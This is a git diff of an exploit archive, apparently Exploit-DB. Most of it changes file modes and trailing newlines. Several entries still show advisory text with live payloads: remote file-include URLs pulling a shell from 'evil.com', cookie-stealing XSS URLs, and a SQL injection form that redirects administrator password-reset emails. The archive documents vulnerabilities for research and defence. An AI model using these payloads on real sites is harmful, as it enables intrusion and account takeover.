7e220b4bb..f9535b688 --- a/platforms/php/webapps/28447.php +++ b/platforms/php/webapps/28447.php @@ -202,4 +202,4 @@ HTTP/1.1\r\n"; } -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/28452.txt b/platforms/php/webapps/28452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28453.txt b/platforms/php/webapps/28453.txt old mode 100755 new mode 100644 index f044f168e..c7fd8395c --- a/platforms/php/webapps/28453.txt +++ b/platforms/php/webapps/28453.txt @@ -4,4 +4,4 @@ ezContents is prone to multiple remote file-include vulnerabilities because the An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls \ No newline at end of file +http://www.example.com/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls \ No newline at end of file diff --git a/platforms/php/webapps/28454.txt b/platforms/php/webapps/28454.txt old mode 100755 new mode 100644 index 34f5a9af3..86c645d5a --- a/platforms/php/webapps/28454.txt +++ b/platforms/php/webapps/28454.txt @@ -4,4 +4,4 @@ ezContents is prone to multiple remote file-include vulnerabilities because the An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/modules/calendar/calendar.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls \ No newline at end of file +http://www.example.com/modules/calendar/calendar.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls \ No newline at end of file diff --git a/platforms/php/webapps/28455.txt b/platforms/php/webapps/28455.txt old mode 100755 new mode 100644 index 4fe3046ab..8098e8960 --- a/platforms/php/webapps/28455.txt +++ b/platforms/php/webapps/28455.txt @@ -4,4 +4,4 @@ ezContents is prone to multiple remote file-include vulnerabilities because the An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/modules/gallery/gallery_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls \ No newline at end of file +http://www.example.com/modules/gallery/gallery_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls \ No newline at end of file diff --git a/platforms/php/webapps/28456.txt b/platforms/php/webapps/28456.txt old mode 100755 new mode 100644 index 5e2afe8d4..7996b3061 --- a/platforms/php/webapps/28456.txt +++ b/platforms/php/webapps/28456.txt @@ -4,4 +4,4 @@ ezContents is prone to multiple remote file-include vulnerabilities because the An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/modules/guestbook/showguestbook.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls \ No newline at end of file +http://www.example.com/modules/guestbook/showguestbook.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls \ No newline at end of file diff --git a/platforms/php/webapps/28457.txt b/platforms/php/webapps/28457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28458.txt b/platforms/php/webapps/28458.txt old mode 100755 new mode 100644 index f8ca0880d..ad95870aa --- a/platforms/php/webapps/28458.txt +++ b/platforms/php/webapps/28458.txt @@ -4,4 +4,4 @@ ezContents is prone to multiple remote file-include vulnerabilities because the An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/modules/news/shownews.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls \ No newline at end of file +http://www.example.com/modules/news/shownews.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls \ No newline at end of file diff --git a/platforms/php/webapps/28459.txt b/platforms/php/webapps/28459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28460.txt b/platforms/php/webapps/28460.txt old mode 100755 new mode 100644 index 804d3b68d..e2f75c5d8 --- a/platforms/php/webapps/28460.txt +++ b/platforms/php/webapps/28460.txt @@ -4,4 +4,4 @@ ezContents is prone to multiple remote file-include vulnerabilities because the An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/modules/reviews/review_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls \ No newline at end of file +http://www.example.com/modules/reviews/review_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls \ No newline at end of file diff --git a/platforms/php/webapps/28461.txt b/platforms/php/webapps/28461.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28462.txt b/platforms/php/webapps/28462.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28464.txt b/platforms/php/webapps/28464.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28465.txt b/platforms/php/webapps/28465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28466.txt b/platforms/php/webapps/28466.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28467.txt b/platforms/php/webapps/28467.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28468.txt b/platforms/php/webapps/28468.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2847.txt b/platforms/php/webapps/2847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28470.txt b/platforms/php/webapps/28470.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28471.txt b/platforms/php/webapps/28471.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28472.txt b/platforms/php/webapps/28472.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28473.txt b/platforms/php/webapps/28473.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28485.txt b/platforms/php/webapps/28485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28486.txt b/platforms/php/webapps/28486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28487.txt b/platforms/php/webapps/28487.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28488.php b/platforms/php/webapps/28488.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28490.txt b/platforms/php/webapps/28490.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28492.txt b/platforms/php/webapps/28492.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28493.txt b/platforms/php/webapps/28493.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28494.txt b/platforms/php/webapps/28494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28495.txt b/platforms/php/webapps/28495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28496.php b/platforms/php/webapps/28496.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28497.txt b/platforms/php/webapps/28497.txt old mode 100755 new mode 100644 index e0a046fe0..67dc6301d --- a/platforms/php/webapps/28497.txt +++ b/platforms/php/webapps/28497.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to steal cookie-based authenticati Version 0.1b is vulnerable; other versions may also be affected. -http://www.example.com/help.php?act=[XSS] \ No newline at end of file +http://www.example.com/help.php?act=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/28498.txt b/platforms/php/webapps/28498.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28499.txt b/platforms/php/webapps/28499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2850.txt b/platforms/php/webapps/2850.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28502.txt b/platforms/php/webapps/28502.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28503.txt b/platforms/php/webapps/28503.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28505.txt b/platforms/php/webapps/28505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28509.txt b/platforms/php/webapps/28509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2851.txt b/platforms/php/webapps/2851.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28510.txt b/platforms/php/webapps/28510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28511.txt b/platforms/php/webapps/28511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28515.txt b/platforms/php/webapps/28515.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28516.txt b/platforms/php/webapps/28516.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28517.txt b/platforms/php/webapps/28517.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28518.txt b/platforms/php/webapps/28518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28519.txt b/platforms/php/webapps/28519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2852.txt b/platforms/php/webapps/2852.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28520.txt b/platforms/php/webapps/28520.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28522.txt b/platforms/php/webapps/28522.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28523.txt b/platforms/php/webapps/28523.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28524.txt b/platforms/php/webapps/28524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28525.txt b/platforms/php/webapps/28525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28526.txt b/platforms/php/webapps/28526.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28527.txt b/platforms/php/webapps/28527.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28528.txt b/platforms/php/webapps/28528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28529.txt b/platforms/php/webapps/28529.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28530.txt b/platforms/php/webapps/28530.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28531.txt b/platforms/php/webapps/28531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28532.txt b/platforms/php/webapps/28532.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28533.txt b/platforms/php/webapps/28533.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28534.txt b/platforms/php/webapps/28534.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28535.txt b/platforms/php/webapps/28535.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28536.txt b/platforms/php/webapps/28536.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28537.txt b/platforms/php/webapps/28537.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28538.txt b/platforms/php/webapps/28538.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28539.txt b/platforms/php/webapps/28539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28540.txt b/platforms/php/webapps/28540.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28541.txt b/platforms/php/webapps/28541.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28543.txt b/platforms/php/webapps/28543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28544.txt b/platforms/php/webapps/28544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28545.txt b/platforms/php/webapps/28545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28546.txt b/platforms/php/webapps/28546.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28547.txt b/platforms/php/webapps/28547.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28548.txt b/platforms/php/webapps/28548.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28549.txt b/platforms/php/webapps/28549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28551.txt b/platforms/php/webapps/28551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28552.txt b/platforms/php/webapps/28552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28554.txt b/platforms/php/webapps/28554.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28556.txt b/platforms/php/webapps/28556.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28557.txt b/platforms/php/webapps/28557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28560.txt b/platforms/php/webapps/28560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28564.txt b/platforms/php/webapps/28564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28565.txt b/platforms/php/webapps/28565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28567.txt b/platforms/php/webapps/28567.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28568.txt b/platforms/php/webapps/28568.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28569.txt b/platforms/php/webapps/28569.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28571.txt b/platforms/php/webapps/28571.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28572.txt b/platforms/php/webapps/28572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28573.txt b/platforms/php/webapps/28573.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28574.txt b/platforms/php/webapps/28574.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28575.txt b/platforms/php/webapps/28575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28580.txt b/platforms/php/webapps/28580.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28581.txt b/platforms/php/webapps/28581.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28582.txt b/platforms/php/webapps/28582.txt old mode 100755 new mode 100644 index fdd848a4e..9a06fed97 --- a/platforms/php/webapps/28582.txt +++ b/platforms/php/webapps/28582.txt @@ -5,4 +5,4 @@ Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cr A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, exploit vulnerabilities in the underlying database implementation, or upload and execute arbitrary files within the webserver process. Other attacks are also possible. http://www.example.com/modules/blocks.php?is_webmaster=2&language[Admin%20name]=<script>alert(document.cookie);</script> -http://www.example.com/modules/blocks.php?is_webmaster=2&language[Admin%20back]=<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/modules/blocks.php?is_webmaster=2&language[Admin%20back]=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/28583.txt b/platforms/php/webapps/28583.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28584.txt b/platforms/php/webapps/28584.txt old mode 100755 new mode 100644 index 7c8e4d671..be285d81f --- a/platforms/php/webapps/28584.txt +++ b/platforms/php/webapps/28584.txt @@ -6,4 +6,4 @@ A successful exploit of these vulnerabilities could allow an attacker to comprom http://www.example.com/modules/mass-email.php?language[Mass-Email%20form%20title]=<script>alert(document.cookie);</script> http://www.example.com/modules/mass-email.php?language[Mass-Email%20form%20desc]=<script>alert(document.cookie);</script> -http://www.example.com/modules/mass-email.php?language[Mass-Email%20form%20desc2]=<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/modules/mass-email.php?language[Mass-Email%20form%20desc2]=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/28585.txt b/platforms/php/webapps/28585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28586.txt b/platforms/php/webapps/28586.txt old mode 100755 new mode 100644 index 82a010918..85de8eb4b --- a/platforms/php/webapps/28586.txt +++ b/platforms/php/webapps/28586.txt @@ -6,8 +6,4 @@ A successful exploit of these vulnerabilities could allow an attacker to comprom if magic_quotes_gpc = off login with user name : ' or id=1/* or ' or authorization = 4/* index.php?n=http://www.example.com/modules/register&a=3&d=3&key='%20or%20id=1/* -You will be able to change the password for any user .. know his id and put it in the url. -- or you can use this form by changing http://localhost/jupiter/ to the website dir to recive reset password email to all the administrators <form method="post" action="http://localhost/jupiter/index.php?n=http://www.example.com/modules/register"> <table class="main" cellspacing="1" cellpadding="4" width="100%"> <tr class="head"> <td colspan="2" class="head">Forgot your password?</td> </tr> <tr> <td class="con1" width="42%" valign="middle"><span class="hilight">Username:</span></td> <td class="con1" width="58%" valign="bottom"><input type="text" name="fpwusername" style="width:100%" class="box" tabindex="5" value="' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,ca lendarbday,status,multikey,actime from users where id=1or authorization=4/*"></td> </tr> <tr> <td class="con1"><input type="button" style="width:100" class="box" value="Back" onClick="window.history.go(-1);" tabindex="8"></td> <td class="con1" align="right"><input type="submit" style="width:100" class="box" value="Submit" tabindex="7"></td> </tr> <input type="hidden" name="a" value="3"> <input type="hidden" name="d" value="1"> </table> </form> put the user name value Change security@soqor.net to your email ' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,ca lendarbday,status,multikey,actime from users where id=1or authorization=4/* - - - - \ No newline at end of file +You will be able to change the password for any user .. know his id and put it in the url. -- or you can use this form by changing http://localhost/jupiter/ to the website dir to recive reset password email to all the administrators <form method="post" action="http://localhost/jupiter/index.php?n=http://www.example.com/modules/register"> <table class="main" cellspacing="1" cellpadding="4" width="100%"> <tr class="head"> <td colspan="2" class="head">Forgot your password?</td> </tr> <tr> <td class="con1" width="42%" valign="middle"><span class="hilight">Username:</span></td> <td class="con1" width="58%" valign="bottom"><input type="text" name="fpwusername" style="width:100%" class="box" tabindex="5" value="' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,ca lendarbday,status,multikey,actime from users where id=1or authorization=4/*"></td> </tr> <tr> <td class="con1"><input type="button" style="width:100" class="box" value="Back" onClick="window.history.go(-1);" tabindex="8"></td> <td class="con1" align="right"><input type="submit" style="width:100" class="box" value="Submit" tabindex="7"></td> </tr> <input type="hidden" name="a" value="3"> <input type="hidden" name="d" value="1"> </table> </form> put the user name value Change security@soqor.net to your email ' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,ca lendarbday,status,multikey,actime from users where id=1or authorization=4/* \ No newline at end of file diff --git a/platforms/php/webapps/2859.php b/platforms/php/webapps/2859.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28590.txt b/platforms/php/webapps/28590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28591.php b/platforms/php/webapps/28591.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28592.txt b/platforms/php/webapps/28592.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28594.txt b/platforms/php/webapps/28594.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28598.txt b/platforms/php/webapps/28598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28599.txt b/platforms/php/webapps/28599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28601.txt b/platforms/php/webapps/28601.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28603.txt b/platforms/php/webapps/28603.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28604.txt b/platforms/php/webapps/28604.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28611.txt b/platforms/php/webapps/28611.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28612.txt b/platforms/php/webapps/28612.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28613.txt b/platforms/php/webapps/28613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28614.txt b/platforms/php/webapps/28614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28616.txt b/platforms/php/webapps/28616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28617.txt b/platforms/php/webapps/28617.txt old mode 100755 new mode 100644 index d62974b4a..abf1acafa --- a/platforms/php/webapps/28617.txt +++ b/platforms/php/webapps/28617.txt @@ -6,4 +6,4 @@ These issues may allow an attacker to access sensitive information, execute arbi Version 1.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/adminpanel/includes/helpfiles/help_news.php?the_band=<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/adminpanel/includes/helpfiles/help_news.php?the_band=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/28618.txt b/platforms/php/webapps/28618.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28619.txt b/platforms/php/webapps/28619.txt old mode 100755 new mode 100644 index df9acccf9..de2666a88 --- a/platforms/php/webapps/28619.txt +++ b/platforms/php/webapps/28619.txt @@ -6,4 +6,4 @@ These issues may allow an attacker to access sensitive information, execute arbi Version 1.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/adminpanel/includes/helpfiles/help_mp3.php?max_file_size_purdy=<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/adminpanel/includes/helpfiles/help_mp3.php?max_file_size_purdy=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/2862.txt b/platforms/php/webapps/2862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28620.txt b/platforms/php/webapps/28620.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28621.txt b/platforms/php/webapps/28621.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28622.txt b/platforms/php/webapps/28622.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28623.txt b/platforms/php/webapps/28623.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28624.txt b/platforms/php/webapps/28624.txt old mode 100755 new mode 100644 index 41fe210b7..df443f366 --- a/platforms/php/webapps/28624.txt +++ b/platforms/php/webapps/28624.txt @@ -6,4 +6,4 @@ These issues may allow an attacker to access sensitive information, execute arbi Version 1.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/includes/content/gbook_content.php?the_band=<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/includes/content/gbook_content.php?the_band=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/28625.txt b/platforms/php/webapps/28625.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28626.txt b/platforms/php/webapps/28626.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28627.txt b/platforms/php/webapps/28627.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28628.txt b/platforms/php/webapps/28628.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28629.txt b/platforms/php/webapps/28629.txt old mode 100755 new mode 100644 index f6d3fd12b..92edc7584 --- a/platforms/php/webapps/28629.txt +++ b/platforms/php/webapps/28629.txt @@ -6,4 +6,4 @@ These issues may allow an attacker to access sensitive information, execute arbi Version 1.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/includes/content/merch_content.php?the_band=<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/includes/content/merch_content.php?the_band=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/2863.php b/platforms/php/webapps/2863.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28630.txt b/platforms/php/webapps/28630.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28631.txt b/platforms/php/webapps/28631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28632.txt b/platforms/php/webapps/28632.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28633.txt b/platforms/php/webapps/28633.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28634.txt b/platforms/php/webapps/28634.txt old mode 100755 new mode 100644 index 4c8070833..6c5810b3d --- a/platforms/php/webapps/28634.txt +++ b/platforms/php/webapps/28634.txt @@ -6,4 +6,4 @@ These issues may allow an attacker to access sensitive information, execute arbi Version 1.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/includes/content/releases_content.php?the_band=<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/includes/content/releases_content.php?the_band=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/28635.txt b/platforms/php/webapps/28635.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28636.txt b/platforms/php/webapps/28636.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28637.txt b/platforms/php/webapps/28637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28638.txt b/platforms/php/webapps/28638.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2864.txt b/platforms/php/webapps/2864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28644.txt b/platforms/php/webapps/28644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28645.txt b/platforms/php/webapps/28645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28646.txt b/platforms/php/webapps/28646.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28647.txt b/platforms/php/webapps/28647.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28654.txt b/platforms/php/webapps/28654.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28656.txt b/platforms/php/webapps/28656.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28658.txt b/platforms/php/webapps/28658.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28660.php b/platforms/php/webapps/28660.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28661.txt b/platforms/php/webapps/28661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28662.txt b/platforms/php/webapps/28662.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28663.txt b/platforms/php/webapps/28663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28664.txt b/platforms/php/webapps/28664.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28665.txt b/platforms/php/webapps/28665.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28667.txt b/platforms/php/webapps/28667.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28668.txt b/platforms/php/webapps/28668.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28669.txt b/platforms/php/webapps/28669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2867.php b/platforms/php/webapps/2867.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28670.txt b/platforms/php/webapps/28670.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28671.txt b/platforms/php/webapps/28671.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28673.txt b/platforms/php/webapps/28673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28675.txt b/platforms/php/webapps/28675.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28676.txt b/platforms/php/webapps/28676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28684.txt b/platforms/php/webapps/28684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28685.txt b/platforms/php/webapps/28685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28686.txt b/platforms/php/webapps/28686.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28687.txt b/platforms/php/webapps/28687.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28688.txt b/platforms/php/webapps/28688.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28689.txt b/platforms/php/webapps/28689.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2869.php b/platforms/php/webapps/2869.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28690.txt b/platforms/php/webapps/28690.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28691.txt b/platforms/php/webapps/28691.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28692.txt b/platforms/php/webapps/28692.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28693.txt b/platforms/php/webapps/28693.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28694.txt b/platforms/php/webapps/28694.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28695.txt b/platforms/php/webapps/28695.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28696.txt b/platforms/php/webapps/28696.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28697.txt b/platforms/php/webapps/28697.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28698.txt b/platforms/php/webapps/28698.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28699.txt b/platforms/php/webapps/28699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28700.txt b/platforms/php/webapps/28700.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28701.txt b/platforms/php/webapps/28701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28702.txt b/platforms/php/webapps/28702.txt old 